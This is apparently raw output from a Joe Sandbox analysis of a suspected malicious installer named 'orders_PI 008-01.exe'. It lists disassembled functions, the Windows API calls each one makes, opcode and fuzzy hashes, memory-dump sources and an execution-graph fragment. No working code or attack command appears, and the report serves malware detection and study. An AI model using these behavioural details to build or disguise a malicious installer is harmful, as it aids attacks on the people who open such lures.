                                        • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                        • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                        • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                        Function 6FF425B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6FF4121B: GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        • GlobalFree.KERNEL32(?), ref: 6FF426A3
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF426D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: a822d23b48568b3f3d66e4274004f5704ca3c9affc177be5894c4b39557a051d
                                        • Instruction ID: c97ff57f952e20d08e91d4493e7bd553e4edb81a0b2f3b854f4318e655be36f7
                                        • Opcode Fuzzy Hash: a822d23b48568b3f3d66e4274004f5704ca3c9affc177be5894c4b39557a051d
                                        • Instruction Fuzzy Hash: A131CD32214502EFCB15AF68C984E2A7FBAFF973143144239F500D7262C732A829CB65
                                        Function 6FF418D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        • Opcode ID: 667733a3493d08b3a524972902016801cf0064947eaeaddc8d774d0ea7ddf361
                                        • Instruction ID: d05cd5d60aae199ae33422b8e5d82d6580dce23c7bb00569883738afd0321fdb
                                        • Opcode Fuzzy Hash: 667733a3493d08b3a524972902016801cf0064947eaeaddc8d774d0ea7ddf361
                                        • Instruction Fuzzy Hash: 8851C332D041599ACB239FB886806AEBFB5EF45358B0042DBD514E7243D771BEB187B1
                                        Function 6FF423E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF42522
                                          • Part of subcall function 6FF4122C: lstrcpynW.KERNEL32(00000000,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF4123C
                                        • GlobalAlloc.KERNEL32(?), ref: 6FF424A8
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF424C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 4216380887-0
                                        • Opcode ID: 2e83babe5917969118adda0704c1ea43f052018a933472fc3fbd12e7dd0a596e
                                        • Instruction ID: f3d3a3489d5bbfa72743f45ad37e51a4ac87fbf1dc7f8c628e435133fd9516cb
                                        • Opcode Fuzzy Hash: 2e83babe5917969118adda0704c1ea43f052018a933472fc3fbd12e7dd0a596e
                                        • Instruction Fuzzy Hash: BA41CEB1108305DFD714EF789880A667BB8FF5A310B00492DE865C72A3DB36A554CB61
                                        Function 6FF4161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF41635
                                        • GlobalAlloc.KERNEL32(?,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF4163C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FF42238,?,00000808), ref: 6FF41650
                                        • GetProcAddress.KERNEL32(6FF42238,00000000), ref: 6FF41657
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41660
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                        • String ID:
                                        • API String ID: 1148316912-0
                                        • Opcode ID: 255eb3491d811a9660292a1617febdd4106d6334ddc09c869aa98417be239fdd
                                        • Instruction ID: 83b148139e687a40eeb4b3351d7456361b3484777bd9221430eff7d580bf38b7
                                        • Opcode Fuzzy Hash: 255eb3491d811a9660292a1617febdd4106d6334ddc09c869aa98417be239fdd
                                        • Instruction Fuzzy Hash: 39F037721165387FDA202AAB8C4CD9B7E9CEF9B2F5B110311F718E12A1C5624C25DBF1
                                        Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                        • CharNextW.USER32(00000000), ref: 00405D81
                                        • CharNextW.USER32(00000000), ref: 00405D99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\
                                        • API String ID: 3213498283-3404278061
                                        • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                        • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                        • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                        • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                        Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00405CC9
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00405CD3
                                        • lstrcatW.KERNEL32(?,0040A014,?,?,?,?), ref: 00405CE5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-4083868402
                                        • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                        • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                        • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                        Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040318F,?,?,?,?,?), ref: 00402FC4
                                        • GetTickCount.KERNEL32 ref: 00402FE2
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                        • ShowWindow.USER32(00000000,?,?,?,?,?), ref: 0040300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                        • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                        • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                        • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                        Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,?,?,?,?,?), ref: 00403A42
                                        • GlobalFree.KERNEL32(00C213C0), ref: 00403A49
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-4083868402
                                        • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                        • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                        • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                        • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                        Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405D15
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405D25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-1876063424
                                        • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                        • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                        • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                        Function 6FF410E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(?,?), ref: 6FF4116A
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF411C7
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF411D9
                                        • GlobalFree.KERNEL32(?), ref: 6FF41203
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: cac0c61c526f5ef47cd6c06ceaf58fd99222d31e3f5d3b46c761a8532c4c2659
                                        • Instruction ID: e1875f5905329ca1e6eb62d673c14b64caa1488bbc2c90aacdbc40e35b9f0f92
                                        • Opcode Fuzzy Hash: cac0c61c526f5ef47cd6c06ceaf58fd99222d31e3f5d3b46c761a8532c4c2659
                                        • Instruction Fuzzy Hash: 4F31A1B64102069BDB02AF7CC945B667FECEF96320714021AE844D7363E774E9758B60
                                        Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                        • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E82
                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                        • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                        • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                        Execution Graph

                                        Execution Coverage:2.5%
                                        Dynamic/Decrypted Code Coverage:96.8%
                                        Signature Coverage:1.3%
                                        Total number of Nodes:1712
                                        Total number of Limit Nodes:5
                                        execution_graph 6390 344b2049 6392 344b2055 ___DestructExceptionObject 6390->6392 6391 344b205e 6392->6391 6393 344b207d 6392->6393 6394 344b20d3 6392->6394 6404 344b244c 6393->6404 6425 344b2639 IsProcessorFeaturePresent 6394->6425 6397 344b20da 6398 344b2082 6413 344b2308 6398->6413 6400 344b2087 __RTC_Initialize 6416 344b20c4 6400->6416 6402 344b209f 6419 344b260b 6402->6419 6405 344b2451 ___scrt_release_startup_lock 6404->6405 6406 344b2455 6405->6406 6410 344b2461 6405->6410 6429 344b527a 6406->6429 6409 344b246e 6409->6398 6410->6409 6432 344b499b 6410->6432 6511 344b34c7 RtlInterlockedFlushSList 6413->6511 6415 344b2312 6415->6400 6513 344b246f 6416->6513 6418 344b20c9 ___scrt_release_startup_lock 6418->6402 6420 344b2617 6419->6420 6421 344b262d 6420->6421 6554 344b53ed 6420->6554 6421->6391 6426 344b264e ___scrt_fastfail 6425->6426 6427 344b26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6426->6427 6428 344b2744 ___scrt_fastfail 6427->6428 6428->6397 6454 344b5132 6429->6454 6433 344b49a7 _abort 6432->6433 6434 344b49bf 6433->6434 6476 344b4af5 GetModuleHandleW 6433->6476 6485 344b5671 RtlEnterCriticalSection 6434->6485 6441 344b4aae 6501 344bbdc9 6441->6501 6442 344b4a82 6493 344b4ab4 6442->6493 6443 344b49c7 6445 344b4a3c 6443->6445 6447 344b527a _abort 20 API calls 6443->6447 6453 344b4a65 6443->6453 6444 344b4a54 6450 344b4669 _abort 5 API calls 6444->6450 6445->6444 6486 344b4669 6445->6486 6447->6445 6450->6453 6490 344b4aa5 6453->6490 6457 344b50e1 6454->6457 6456 344b245f 6456->6398 6458 344b50ed ___DestructExceptionObject 6457->6458 6465 344b5671 RtlEnterCriticalSection 6458->6465 6460 344b50fb 6466 344b515a 6460->6466 6464 344b5119 _abort 6464->6456 6465->6460 6469 344b5182 6466->6469 6470 344b517a 6466->6470 6467 344b2ada _ValidateLocalCookies 5 API calls 6468 344b5108 6467->6468 6472 344b5126 6468->6472 6469->6470 6471 344b571e _free 20 API calls 6469->6471 6470->6467 6471->6470 6475 344b56b9 RtlLeaveCriticalSection 6472->6475 6474 344b5130 6474->6464 6475->6474 6477 344b49b3 6476->6477 6477->6434 6478 344b4b39 GetModuleHandleExW 6477->6478 6479 344b4b63 GetProcAddress 6478->6479 6480 344b4b78 6478->6480 6479->6480 6481 344b4b8c FreeLibrary 6480->6481 6482 344b4b95 6480->6482 6481->6482 6483 344b2ada _ValidateLocalCookies 5 API calls 6482->6483 6484 344b4b9f 6483->6484 6484->6434 6485->6443 6487 344b4698 6486->6487 6488 344b2ada _ValidateLocalCookies 5 API calls 6487->6488 6489 344b46c1 6488->6489 6489->6444 6504 344b56b9 RtlLeaveCriticalSection 6490->6504 6492 344b4a7e 6492->6441 6492->6442 6505 344b6025 6493->6505 6496 344b4ae2 6499 344b4b39 _abort 8 API calls 6496->6499 6497 344b4ac2 GetPEB 6497->6496 6498 344b4ad2 GetCurrentProcess TerminateProcess 6497->6498 6498->6496 6500 344b4aea ExitProcess 6499->6500 6502 344b2ada _ValidateLocalCookies 5 API calls 6501->6502 6503 344bbdd4 6502->6503 6503->6503 